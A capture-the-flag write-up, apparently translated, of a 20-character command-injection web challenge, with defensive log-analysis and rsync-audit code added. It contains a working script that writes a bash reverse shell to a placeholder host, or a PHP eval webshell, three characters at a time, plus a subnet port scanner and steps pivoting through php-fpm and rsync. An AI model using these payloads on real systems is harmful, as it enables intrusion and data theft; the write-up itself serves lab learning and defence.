0x01 Preface
For the previous group-entry challenge, the web one (the WordPress problem), I had no idea at all. This time my thinking was clear from the start and I got lucky and solved it. Looking back, the year of study was not wasted: I am still pretty weak, but at least I have some motivation now.
0x02 Challenge description

0x03 Constructing the payload
Looking at the challenge, isn't this the HITCON 2017 problem? Those two challenges limited the command to 4 and 5 characters; this one allows 20, which makes it even easier. We can use "echo \c" (\c suppresses the trailing newline) together with the redirection operators "> >>" to write the code into a file a few characters at a time, so the payload only needs a simple construction:
# written by python3.5
# -*- coding:utf-8 -*-
import requests
import urllib.parse

url = "https://473831530.trains.virzz.com/index.php"
payload = "bash -i >& /dev/tcp/yourIp/yourPort 0>&1"
#payload = "<?php @eval($_POST[1]);?>"
req = requests.get(url + "?reset=1")            # reset the challenge state first
x = [i for i in range(len(payload)) if i % 3 == 0]
pay = [payload[i:i + 3] for i in x]             # split the payload into 3-character chunks
for i in pay:
    # echo '<chunk>\c' >>1 : \c drops the newline, >> appends the chunk to the file "1"
    p = "echo '" + i + "\\c" + "' >>1"
    print(p)
    assert len(p) <= 20                         # every command must fit the 20-character limit
    requests.get(url + "?cmd={}".format(urllib.parse.quote(p)))
requests.get(url + "?cmd=bash 1")               # run the reassembled file
This pops a reverse shell. If you instead uncomment the "<?php @eval($_POST[1]);?>" payload line and change the target filename in the echo line from 1 to 1.php, a one-line webshell is written successfully; then use the small shell to upload a big one (ps: big webshells can be found at http://webshell8.com/).
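Seen from the defender's side, this chunked write leaves a very recognisable trail in the web server's access log: a burst of short cmd= requests from one client, each containing echo, the \c escape and an append redirect to the same file, followed by a request that executes that file. The following is an added example (my own code, not part of this writeup) that parses a few constructed common-log-format lines, flags those requests and reassembles the staged file so an incident responder can see what was written; the log format, the cmd parameter name and the sample command are assumptions modelled on the challenge above.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (common log format). The cmd values are
# URL-encoded the way requests.get(urllib.parse.quote(...)) would send them;
# the staged command here is a harmless "cat /etc/hosts" split into 3-char chunks.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jan/2019:10:00:01 +0000] "GET /index.php?reset=1 HTTP/1.1" 200 12
10.0.0.5 - - [12/Jan/2019:10:00:02 +0000] "GET /index.php?cmd=echo%20%27cat%5Cc%27%20%3E%3E1 HTTP/1.1" 200 0
10.0.0.5 - - [12/Jan/2019:10:00:03 +0000] "GET /index.php?cmd=echo%20%27%20/e%5Cc%27%20%3E%3E1 HTTP/1.1" 200 0
10.0.0.5 - - [12/Jan/2019:10:00:04 +0000] "GET /index.php?cmd=echo%20%27tc/%5Cc%27%20%3E%3E1 HTTP/1.1" 200 0
10.0.0.5 - - [12/Jan/2019:10:00:05 +0000] "GET /index.php?cmd=echo%20%27hos%5Cc%27%20%3E%3E1 HTTP/1.1" 200 0
10.0.0.5 - - [12/Jan/2019:10:00:06 +0000] "GET /index.php?cmd=echo%20%27ts%5Cc%27%20%3E%3E1 HTTP/1.1" 200 0
10.0.0.5 - - [12/Jan/2019:10:00:07 +0000] "GET /index.php?cmd=bash%201 HTTP/1.1" 200 170
10.0.0.9 - - [12/Jan/2019:10:01:00 +0000] "GET /index.php?cmd=ls HTTP/1.1" 200 40
"""

# Request line of a CLF entry: method, path (with query string), protocol.
REQ_LINE = re.compile(r'"(?:GET|POST)\s+(?P<path>\S+)\s+HTTP/')
# A single chunk write: echo '<chunk>\c' > file  or  echo '<chunk>\c' >> file
CHUNK_WRITE = re.compile(r"^echo\s+'(?P<chunk>.*?)\\c'\s*(?P<redir>>{1,2})\s*(?P<target>\S+)$")


def extract_cmds(log_text):
    """Yield (client_ip, decoded cmd value) for every request carrying a cmd parameter."""
    for line in log_text.splitlines():
        m = REQ_LINE.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        query = urlsplit(m.group("path")).query
        cmd = parse_qs(query).get("cmd")          # parse_qs URL-decodes the value
        if cmd:
            yield client, cmd[0]


def analyse(log_text):
    """Return (alerts, staged).

    alerts: list of (client, cmd) for every chunk-write command seen.
    staged: {(client, target_file): reconstructed file content}.
    """
    alerts = []
    staged = defaultdict(str)
    for client, cmd in extract_cmds(log_text):
        m = CHUNK_WRITE.match(cmd)
        if not m:
            continue
        alerts.append((client, cmd))
        key = (client, m.group("target"))
        if m.group("redir") == ">":               # a single '>' truncates, so restart the file
            staged[key] = ""
        staged[key] += m.group("chunk")
    return alerts, dict(staged)


def executed_staged(log_text, staged):
    """Commands that execute one of the reconstructed files, e.g. 'bash 1'."""
    hits = []
    for client, cmd in extract_cmds(log_text):
        parts = cmd.split()
        if len(parts) == 2 and parts[0] in ("sh", "bash") and (client, parts[1]) in staged:
            hits.append((client, cmd))
    return hits


if __name__ == "__main__":
    alerts, staged = analyse(SAMPLE_LOG)
    print("chunk-write requests flagged:", len(alerts))
    for (client, target), content in staged.items():
        print("{} staged file {!r} containing {!r}".format(client, target, content))
    for client, cmd in executed_staged(SAMPLE_LOG, staged):
        print("{} then executed it with {!r}".format(client, cmd))
```

The reconstruction is only as good as the log: it needs the full query string recorded, so make sure the web server logs the request line unabridged, and note that a single ">" in the middle of a burst resets the reassembled content the way it would reset the file on disk.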

It looks like the upload succeeded; let's visit it and check:

Upload successful. Combined with the hints "python3" and "the flag is not on this server", the first thought is pivoting into the internal network, but damn, ifconfig and the other commands for finding the IP are all disabled. You can use cat /etc/hosts instead, and a fellow student simply included a phpinfo page and got the host IP that way.

Upload an IP and port scanning script:
#!/usr/bin/env python3
import telnetlib
import threading
import queue
import sys


def get_ip_status(ip):
    server = telnetlib.Telnet()
    for port in [21, 22, 23, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 443, 873, 1433, 3306, 3389, 5432, 6082, 6379, 7001, 7002, 8000, 9000, 9090, 8080, 8081, 8089, 27017, 27018]:
        try:
            server.open(ip, port, timeout=2)   # short timeout so filtered ports do not hang the thread
            print('{0} port {1} is open'.format(ip, port))
        except Exception:
            #print('{0} port {1} is not open'.format(ip, port))
            pass
        finally:
            server.close()


def check_open(q):
    # worker: pull hosts off the queue until it is empty
    try:
        while True:
            ip = q.get_nowait()
            get_ip_status(ip)
    except queue.Empty:
        pass


if __name__ == '__main__':
    host = []
    ip = sys.argv[1:]
    ip = "".join(ip)
    args = ".".join(ip.split(".")[:-1])        # keep the /24 prefix of the given IP
    for i in range(1, 256):
        host.append("{off1}.{off2}".format(off1=args, off2=i))
    q = queue.Queue()
    for ip in host:
        q.put(ip)
    threads = []
    for i in range(10):                        # 10 worker threads share the queue
        t = threading.Thread(target=check_open, args=(q,))
        t.start()
        threads.append(t)
    for t in threads:
        t.join()
The results show that 172.16.233.111 has ports 80, 873 and 9000 open. Continue with another script:
#!/usr/bin/python3
import urllib.request

HEADERS = {'user-agent': ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) '
                          'AppleWebKit/537.36 (KHTML, like Gecko) '
                          'Chrome/45.0.2454.101 Safari/537.36'),
           'referer': 'http://172.16.233.111/index.html',
           'X-Forwarded-For': '127.0.0.1'
           }
file = urllib.request.Request("http://172.16.233.111:80/", headers=HEADERS)
data = urllib.request.urlopen(file)
print(data.headers)                            # response headers
print(data.read().decode('utf-8'))             # response body

This reveals redirect.php; modifying the script to request redirect.php only gave: connection failed

Searching online for ports 873 and 9000: 873 is associated with unauthenticated rsync access and 9000 with php-fpm, which can allow unauthenticated arbitrary command execution. I tried rsync, but on the 222 machine that command was disabled.
Continuing to search on port 9000, I found an exploit script in an article by Phithon (https://www.leavesongs.com/PENETRATION/fastcgi-and-php-fpm.html). After uploading and running it, I found the flag file in the root directory:

But we are not root, only the ordinary nobody user, so we cannot read the flag. Stuck again. I thought about trying privilege escalation, but on reflection that seemed infeasible (if you could get root on this, that would be too much). Then I remembered that the unauthenticated rsync access on 873 had not been used yet, so I quickly checked the rsync configuration file:

Damn, it is restricted to local; so that is why the rsync command could not be run. In the end I asked a senior, who said: "Since you already have arbitrary command execution, why not pop a reverse shell?" Wow, I really am a noob, dumb from doing too many challenges. Reverse shell directly from /tmp (again following Phithon's https://www.leavesongs.com/PHP/backshell-via-php.html):

Reverse shell successful; now we just run the rsync command to get the flag:
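The rsync step is worth a defender's look: the configuration restricted the module to local clients, yet the flag was still read, because command execution on that same host (via php-fpm) made every "local" client available. A hosts allow line is a network control, not authentication. The following is an added example (my own code, not from the writeup) that parses a constructed weak rsyncd.conf next to a hardened version of the same module and reports the settings that matter; the module name, path and addresses are made up.

```python
# Constructed weak rsyncd.conf: the module needs no credentials at all, and
# 'hosts allow' only limits it to localhost, which any local process can reach.
WEAK_CONF = """\
uid = nobody
gid = nobody
use chroot = yes

[flag]
    path = /flag_dir
    read only = yes
    hosts allow = 127.0.0.1 localhost
"""

# Constructed hardened version: named user with a secrets file, module not
# listed, and the client restriction narrowed to the network that needs it.
HARDENED_CONF = """\
uid = nobody
gid = nobody
use chroot = yes

[flag]
    path = /flag_dir
    read only = yes
    list = no
    hosts allow = 10.0.0.0/24
    auth users = backup
    secrets file = /etc/rsyncd.secrets
"""

FALSE_VALUES = ("no", "false", "0")
LOCAL_HOSTS = ("127.0.0.1", "localhost", "::1")

DESCRIPTIONS = {
    "no-auth": "no 'auth users' / 'secrets file': anyone the hosts line admits can read the module",
    "any-host": "'hosts allow' not set: every client may connect",
    "localhost-only": "'hosts allow' is localhost only: does not stop a pivot from a shell on this host",
    "writable": "module is writable (read only = no)",
    "listable": "module is listed to clients; set 'list = no'",
}


def parse_rsyncd(text):
    """Parse rsyncd.conf into {module_name: {key: value}}; global keys live under ''."""
    modules = {"": {}}
    current = ""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and surrounding whitespace
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip()
            modules[current] = {}
            continue
        key, _, value = line.partition("=")
        modules[current][key.strip().lower()] = value.strip()
    return modules


def audit(text):
    """Return a list of (module, finding_code) for every risky module setting."""
    findings = []
    for module, opts in parse_rsyncd(text).items():
        if module == "":
            continue
        if "auth users" not in opts or "secrets file" not in opts:
            findings.append((module, "no-auth"))
        hosts = opts.get("hosts allow", "").split()
        if not hosts or hosts == ["*"]:           # rsyncd default: all hosts allowed
            findings.append((module, "any-host"))
        elif all(h in LOCAL_HOSTS for h in hosts):
            findings.append((module, "localhost-only"))
        if opts.get("read only", "yes").lower() in FALSE_VALUES:
            findings.append((module, "writable"))
        if opts.get("list", "yes").lower() not in FALSE_VALUES:
            findings.append((module, "listable"))
    return findings


if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print("==", name, "==")
        for module, code in audit(conf) or [(None, None)]:
            print("  [{}] {}".format(module, DESCRIPTIONS[code]) if code else "  no findings")
```

The same reasoning applies to the php-fpm service on port 9000: its listen directive in www.conf should bind a UNIX socket or 127.0.0.1, not every interface, and even then the web server in front of it is the only process that should be able to reach it.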
